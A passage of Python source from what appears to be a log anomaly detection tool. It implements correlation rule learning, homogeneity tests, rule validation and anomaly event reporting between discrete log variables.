enumerate(self.pos_var_cor[event_index]): # Only consider the possible correlations which have been initialized if self.w_rel_list[event_index][pos_var_cor_index] != [{}, {}]: # Initialise the lists for the indices that failed the binomial test failed_i_vals = [] failed_j_vals = [] # Check correlations i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: # States True after the following steps if all tests were positive, and False if at least one was negative. tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][0][i_val][j_val] for j_val in current_appearance_list[ pos_var_cor_index][0][i_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][0][i_val], current_appearance_list[pos_var_cor_index][0][i_val], event_index, pos_var_cor_index, 0, i_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][0][i_val][1:] + [0] failed_i_vals.append(i_val) # Check correlations j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: # States True after the following steps if all tests were positive, and False if at least one was negative tmp_bool = True if sum(current_appearance_list[pos_var_cor_index][1][j_val][i_val] for i_val in current_appearance_list[ pos_var_cor_index][1][j_val]) > self.min_values_cors_thres: tmp_bool = self.homogeneity_test(self.w_rel_list[event_index][pos_var_cor_index][1][j_val], current_appearance_list[pos_var_cor_index][1][j_val], event_index, pos_var_cor_index, 1, j_val) # Update the bt_results list if tmp_bool: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [1] else: self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = self.w_rel_ht_results[event_index][ pos_var_cor_index][1][j_val][1:] + [0] failed_j_vals.append(j_val) if self.update_rules[event_index] and self.learn_mode: # Print if new values have appeared in the correlation rules message = f'New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of ' \ f'the event {self.event_type_detector.get_event_type(event_index)}' confidence = 0 total_correlations = len([None for _ in self.w_rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.w_rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] distribution_changes = [] for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if len(self.w_rel_list[event_index][pos_var_cor_index][0][i_val]) != len(current_appearance_list[ pos_var_cor_index][0][i_val]): if len(current_appearance_list[pos_var_cor_index][0][i_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) >= self.new_vals_alarm_thres: sorted_log_lines.append( # skipcq: PYL-C0209 'Alarm: New value occurred in correlation of the paths %s = %s -> %s =' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) else: # skipcq: PYL-C0209 sorted_log_lines.append('New value occurred in correlation of the paths %s = %s -> %s =' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) distribution = { 'OldDistribution': [[j_val, self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values())] for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val].keys()], 'NewDistribution': [[j_val, current_appearance_list[pos_var_cor_index][0][i_val][j_val] / sum( current_appearance_list[pos_var_cor_index][0][i_val].values())] for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for j_val in current_appearance_list[pos_var_cor_index][0][i_val].keys(): if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 0 for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if len(self.w_rel_list[event_index][pos_var_cor_index][1][j_val]) != len(current_appearance_list[ pos_var_cor_index][1][j_val]): if len(current_appearance_list[pos_var_cor_index][1][j_val]) / len(self.w_rel_list[event_index][ pos_var_cor_index][1][j_val]) >= self.new_vals_alarm_thres: # skipcq: PYL-C0209 sorted_log_lines.append('Alarm: New value occurred in correlation of the paths %s = %s -> %s =' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) else: # skipcq: PYL-C0209 sorted_log_lines.append('New value occurred in correlation of the paths %s = %s -> %s =' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]])) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][pos_var_cor_val[0]]]) distribution = { 'OldDistribution': [[i_val, self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] / sum( self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values())] for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val].keys()], 'NewDistribution': [[i_val, current_appearance_list[pos_var_cor_index][1][j_val][i_val] / sum( current_appearance_list[pos_var_cor_index][1][j_val].values())] for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys()] } distribution_changes.append(distribution) sorted_log_lines.append(f"Old distribution: {distribution['OldDistribution']}") sorted_log_lines.append(f"New distribution: {distribution['NewDistribution']}") confidence += 1 / total_correlations # Add the new values to the correlation rule for i_val in current_appearance_list[pos_var_cor_index][1][j_val].keys(): if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 0 if len(sorted_log_lines) != 0: event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['DistributionChanges'] = distribution_changes event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # Remove the failed rules if it is an update step # Binomial test and delete rules of the form i=i_val -> j=j_val for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 0, i_val) del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] # Binomial test and delete rules of the form j=j_val -> i=i_val for j_val in failed_j_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_update(event_index, pos_var_cor_index, 1, j_val) del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] # Update the distributions of the correlation rules, which succeeded the test above # Update i=i_val -> j=j_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0]: if self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val][-1]: for j_val in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += current_appearance_list[ pos_var_cor_index][0][i_val][j_val] # Update j=j_val -> i=i_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1]: if self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val][-1]: for i_val in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += current_appearance_list[ pos_var_cor_index][1][j_val][i_val] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Print the rules, which failed the binomial test for i_val in failed_i_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 0, i_val) self.w_rel_ht_results[event_index][pos_var_cor_index][0][i_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][0][i_val] = [] for j_val in failed_j_vals: if sum(self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val]) < self.min_successes_bt: # BT self.print_failed_wrel_test(event_index, pos_var_cor_index, 1, j_val) self.w_rel_ht_results[event_index][pos_var_cor_index][1][j_val] = [1] * self.num_bt self.w_rel_confidences[event_index][pos_var_cor_index][1][j_val] = [] # skipcq: PYL-R0201 def homogeneity_test(self, occurrences1, occurrences2, event_index, pos_var_cor_index, cor_direction, value1): """Make a two sample test of homogeneity of the given occurrences.""" if self.used_homogeneity_test == 'Chi': test_result = 0 for val in occurrences1: if occurrences1[val] > 0: observed1 = occurrences1[val] expected1 = sum(occurrences1.values()) * (occurrences1[val]+occurrences2[val]) / \ (sum(occurrences1.values()) + sum(occurrences2.values())) test_result += (observed1 - expected1) * (observed1 - expected1) / expected1 observed2 = occurrences2[val] expected2 = sum(occurrences2.values()) * (occurrences1[val]+occurrences2[val]) / \ (sum(occurrences1.values()) + sum(occurrences2.values())) test_result += (observed2 - expected2) * (observed2 - expected2) / expected2 quantile = chi2.ppf(1-self.alpha_chisquare_test, (len(occurrences1)-1)) if test_result >= quantile: self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(test_result) self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[ event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):] return False elif self.used_homogeneity_test == 'MaxDist': for val in occurrences1: if abs(occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max(1, sum(occurrences2.values()))) > self.max_dist_rule_distr: self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1].append(abs( occurrences1[val] / sum(occurrences1.values()) - occurrences2[val] / max( 1, sum(occurrences2.values())))) self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1] = self.w_rel_confidences[ event_index][pos_var_cor_index][cor_direction][value1][-(self.num_bt-self.min_successes_bt+1):] return False return True # skipcq: PYL-R0201 def pick_cor_match_disc_distr(self, prob_list1, prob_list2): """Check if the the two discrete distribution could have a possible correlation.""" list1 = prob_list1.copy() list2 = prob_list2.copy() list1.sort(reverse=True) list2.sort(reverse=True) for i in range(min(len(list1), len(list2))): if abs(list1[i]-list2[i]) > self.match_disc_distr_threshold/max(len(list1), len(list2)): return False return True # skipcq: PYL-R0201 def pick_cor_exclude_due_distr(self, prob_list): """ Check if the the discrete distribution can be expected to have possible correlation. Returns True for possible correlation and False to be excluded. """ # Assigning epsilon epsilon = self.exclude_due_distr_lower_limit + (1 - self.exclude_due_distr_lower_limit) / len(prob_list) # Check the single probabilities for _, val in enumerate(prob_list): if val > epsilon: return False return True # skipcq: PYL-R0201 def pick_cor_match_disc_vals(self, val_list1, val_list2): """Check through the values of the two discrete distributions if they could have a possible correlation.""" if len([val for val in val_list1 if val in val_list2]) > self.match_disc_vals_sim_tresh*min( len(val_list1), len(val_list2)): return True return False def pick_cor_random(self, event_index): """Match variables randomly to correlation.""" # List of the generated variable pairs tmp_list = [] # Calculate the number of generated variable pairs if self.percentage_random_cors <= 0.5: # Calculate the number of variable pairs. num_total = self.percentage_random_cors * len(self.discrete_indices[event_index]) * (len( self.discrete_indices[event_index]) - 1) / 2 else: # Calculate the number of variable pairs which are not in the resulting correlations. # Used to reduce the runtime for higher values of percentage_random_cors num_total = (1-self.percentage_random_cors) * len(self.discrete_indices[event_index]) * (len( self.discrete_indices[event_index]) - 1) / 2 if round(num_total % 1., 4) < 0.5 or (round(num_total % 1., 4) == 0.5 and self.percentage_random_cors >= 0.5): num_total = int(num_total) else: num_total = int(num_total+1) # Generate num_total variable pairs while len(tmp_list) < num_total: pos_cor = np.random.randint(0, len(self.discrete_indices[event_index]), [num_total - len(tmp_list), 2]) for _, pos_val in enumerate(pos_cor): if pos_val[0] != pos_val[1] and [min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])] not in tmp_list: tmp_list.append([min(pos_val[0], pos_val[1]), max(pos_val[0], pos_val[1])]) if self.percentage_random_cors <= 0.5: # Return the generated variable pairs return tmp_list # Return all variable pairs, which are not in the generated set return [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range(i + 1, len(self.discrete_indices[ event_index])) if [i, j] not in tmp_list] # skipcq: PYL-R0201 def check_cor_w_rel(self, probability_list, total_pos_val): """Check if the probabilities can be considered a possible correlation.""" if (self.check_cor_thres * total_pos_val < len(probability_list)) and ( total_pos_val > self.check_cor_num_thres or max(probability_list) - min(probability_list) < ( self.check_cor_prob_thres * sum(probability_list) / len(probability_list))): return False return True def validate_cor(self): """Validate the found correlations and removes the ones, which fail the requirements.""" for meth in self.used_validate_cor_meth: if meth == 'coverVals': self.validate_cor_cover_vals() elif meth == 'distinctDistr': self.validate_cor_distinct_distr() def validate_cor_cover_vals(self): """ Rate all found relation in regards to their coverage of the values in the first variable. It removes the ones, which have a low rating and therefore can not considered real relations. """ for meth in self.used_cor_meth: if meth == 'Rel': for event_index, event_val in enumerate(self.rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} elif meth == 'WRel': for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): # skipcq: PTC-W0060 # Check if the correlations i=i_val -> j=j_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][0][i_val].values()) for i_val in event_val[pos_var_cor_index][0]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val have a high enough score tmp_sum = sum(sum(event_val[pos_var_cor_index][1][j_val].values()) for j_val in event_val[pos_var_cor_index][1]) if tmp_sum < self.event_type_detector.num_event_lines[event_index]*self.validate_cor_cover_vals_thres: event_val[pos_var_cor_index][1] = {} def validate_cor_distinct_distr(self): """ Compare the right hand sides of the found relations. It removes the correlations, which are too similar to the distribution of the variable type. """ for meth in self.used_cor_meth: if meth == 'WRel': for event_index, event_val in enumerate(self.w_rel_list): for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): # Check if the correlations i=i_val -> j=j_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # skipcq: PTC-W0060 # The probabilities can be read out with: distribution_list[j_val][i_val] frequency_list = [] # List which stores the appearance of the single correlations for i_val in event_val[pos_var_cor_index][0]: if sum(event_val[pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][0][i_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[1]]): if k_val in event_val[pos_var_cor_index][0][i_val]: distribution_list[k].append(event_val[pos_var_cor_index][0][i_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[1]])): # skipcq: PTC-W0060 variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][0] = {} # Check if the correlations j=j_val -> i=i_val are distinct enough to be considered independent # List in which the distributions of the single corrs are saved. distribution_list = [[] for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # skipcq: PTC-W0060 # The probabilities can be read out with: distribution_list[i_val][j_val] frequency_list = [] # List which stores the appearance of the single correlations for j_val in event_val[pos_var_cor_index][1]: if sum(event_val[pos_var_cor_index][1][j_val].values()) > self.min_values_cors_thres: # Calculates the distribution and appends it to distribution_list frequency_list.append(sum(event_val[pos_var_cor_index][1][j_val].values())) for k, k_val in enumerate(self.pos_var_val[event_index][pos_var_cor_val[0]]): if k_val in event_val[pos_var_cor_index][1][j_val]: distribution_list[k].append( event_val[pos_var_cor_index][1][j_val][k_val] / frequency_list[-1]) else: distribution_list[k].append(0) # Number of total appearances total_frequency = max(1, sum(frequency_list)) # Mean of the distributions mean_list = [sum(distribution_list[i][j]*frequency_list[j] for j in range(len(frequency_list)))/total_frequency for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Variance of the correlations variance_list = [0 for _ in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]]))] # Calculate the variance of the single values for i in range(len(self.pos_var_val[event_index][pos_var_cor_val[0]])): # skipcq: PTC-W0060 variance_list[i] = sum((distribution_list[i][j] - mean_list[i])**2 * frequency_list[j] / total_frequency for j in range(len(frequency_list))) # Check if the variance exceeds the threshold if sum(variance_list) < self.validate_cor_distinct_thres: event_val[pos_var_cor_index][1] = {} def print_ini_rel(self, event_index): """Print the generated correlations for the method 'relations'.""" message = f'Initialisation of the method relations of the event {self.event_type_detector.get_event_type(event_index)}' # skipcq: PYL-C0209 message += '\n%s rules have been generated for this event type' % ( sum(len(self.rel_list[event_index][pos_var_cor_index][0]) for pos_var_cor_index in range(len( self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}]) + sum(len( self.rel_list[event_index][pos_var_cor_index][1]) for pos_var_cor_index in range(len(self.rel_list[event_index])) if self.rel_list[event_index][pos_var_cor_index] != [{}, {}])) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i=i_val -> Var j=j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > self.min_values_cors_thres: # skipcq: PYL-C0209 sorted_log_lines.append('x) VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val))) # skipcq: PYL-C0209 sorted_log_lines.append(' ->VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val]] for j_val in pos_var_cor_val[0][ i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j=j_val -> Var i=i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres: # skipcq: PYL-C0209 sorted_log_lines.append('x) VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) # skipcq: PYL-C0209 sorted_log_lines.append(' ->VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], [[i_val, pos_var_cor_val[1][j_val][i_val]] for i_val in pos_var_cor_val[1][j_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_values.append(repr(j_val)) affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][ i_val]] for i_val in pos_var_cor_val[1][j_val].keys()]) if len(sorted_log_lines) != 0: event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedLogAtomValues'] = affected_log_atom_values sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) def print_ini_w_rel(self, event_index): """Print the generated correlations for the method 'weighted relations'.""" message = f'Initialisation of the method weighted relations of the event {self.event_type_detector.get_event_type(event_index)}' # skipcq: PYL-C0209 message += '\n%s rules have been generated for this event type' % ( sum(len([i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if len(self.w_rel_list[event_index][ pos_var_cor_index][0][i_val]) > 0 and sum(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}]) + sum( len([j_val for j_val in pos_var_cor_val[1] if len(pos_var_cor_val[1][j_val]) > 0 and sum( pos_var_cor_val[1][j_val].values()) > self.min_values_cors_thres]) for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]) if pos_var_cor_val != [{}, {}])) sorted_log_lines = [] event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_log_atom_values = [] for pos_var_cor_index, pos_var_cor_val in enumerate(self.w_rel_list[event_index]): if pos_var_cor_val != [{}, {}]: i = self.pos_var_cor[event_index][pos_var_cor_index][0] j = self.pos_var_cor[event_index][pos_var_cor_index][1] for i_val in pos_var_cor_val[0]: # Var i = i_val -> Var j = j_val if len(pos_var_cor_val[0][i_val]) > 0 and sum(pos_var_cor_val[0][i_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[0][i_val].values()) # skipcq: PYL-C0209 sorted_log_lines.append('x) VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], repr(i_val),)) # skipcq: PYL-C0209 sorted_log_lines.append(' ->VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], [[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[0][i_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_values.append(repr(i_val)) affected_log_atom_values.append([[j_val, pos_var_cor_val[0][i_val][j_val] / tmp_sum] for j_val in pos_var_cor_val[ 0][i_val].keys()]) for j_val in pos_var_cor_val[1]: # Var j = j_val -> Var i = i_val if len(pos_var_cor_val[1][j_val]) > 0 and sum(pos_var_cor_val[1][j_val].values()) > 50: tmp_sum = sum(pos_var_cor_val[1][j_val].values()) # skipcq: PYL-C0209 sorted_log_lines.append('x) VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]], repr(j_val))) # skipcq: PYL-C0209 sorted_log_lines.append(' ->VarPath %s = %s' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]], [[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[1][j_val].keys()])) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][j]]) affected_log_atom_paths.append( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][i]]) affected_log_atom_values.append(repr(j_val)) affected_log_atom_values.append([[i_val, pos_var_cor_val[1][j_val][i_val] / tmp_sum] for i_val in pos_var_cor_val[ 1][j_val].keys()]) if len(sorted_log_lines) != 0: event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedLogAtomValues'] = affected_log_atom_values sorted_log_lines += [''] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) def print_failed_wrel_test(self, event_index, pos_var_cor_index, cor_direction, value1): """Print the correlations which failed in a test step for the method 'weighted relations'.""" cor_direction_neg = 0 if cor_direction == 0: cor_direction_neg = 1 # skipcq: PYL-C0209 message = 'Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]], repr(value1), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]], [[value2, self.w_rel_list[event_index][ pos_var_cor_index][cor_direction][value1][value2] / sum(self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].values())] for value2 in self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].keys()], self.event_type_detector.total_records) confidence = sum(self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) / len( self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]]) affected_values.append(repr(value1)) affected_values.append([[value2, self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1][value2] / sum( self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1].values())] for value2 in self.w_rel_list[ event_index][pos_var_cor_index][cor_direction][value1].keys()]) event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines = [''] * self.event_type_detector.total_records for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) def print_failed_wrel_update(self, event_index, pos_var_cor_index, cor_direction, value1): """Print the correlations which failed in an update step for the method 'weighted relations'.""" cor_direction_neg = 0 if cor_direction == 0: cor_direction_neg = 1 # skipcq: PYL-C0209 message = 'Correlation of the target_path_list %s = %s -> %s = %s has been rejected after the %s-th line' % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]], repr(value1), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]], [[value2, self.w_rel_list[event_index][ pos_var_cor_index][cor_direction][value1][value2] / sum(self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].values())] for value2 in self.w_rel_list[event_index][pos_var_cor_index][ cor_direction][value1].keys()], self.event_type_detector.total_records) confidence = sum(self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) / len( self.w_rel_confidences[event_index][pos_var_cor_index][cor_direction][value1]) event_data = {'EventIndex': event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][ self.discrete_indices[event_index][self.pos_var_cor[event_index][pos_var_cor_index][cor_direction_neg]]]) affected_values.append(repr(value1)) affected_values.append([[value2, self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1][value2] / sum( self.w_rel_list[event_index][pos_var_cor_index][cor_direction][value1].values())] for value2 in self.w_rel_list[ event_index][pos_var_cor_index][cor_direction][value1].keys()]) event_data['AffectedLogAtomPaths'] = list(set(affected_log_atom_paths)) event_data['AffectedValues'] = affected_values event_data['TypeInfo'] = {'Confidence': confidence} sorted_log_lines = [''] * self.event_type_detector.total_records for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, self.log_atom, self) # skipcq: PYL-R0201 def 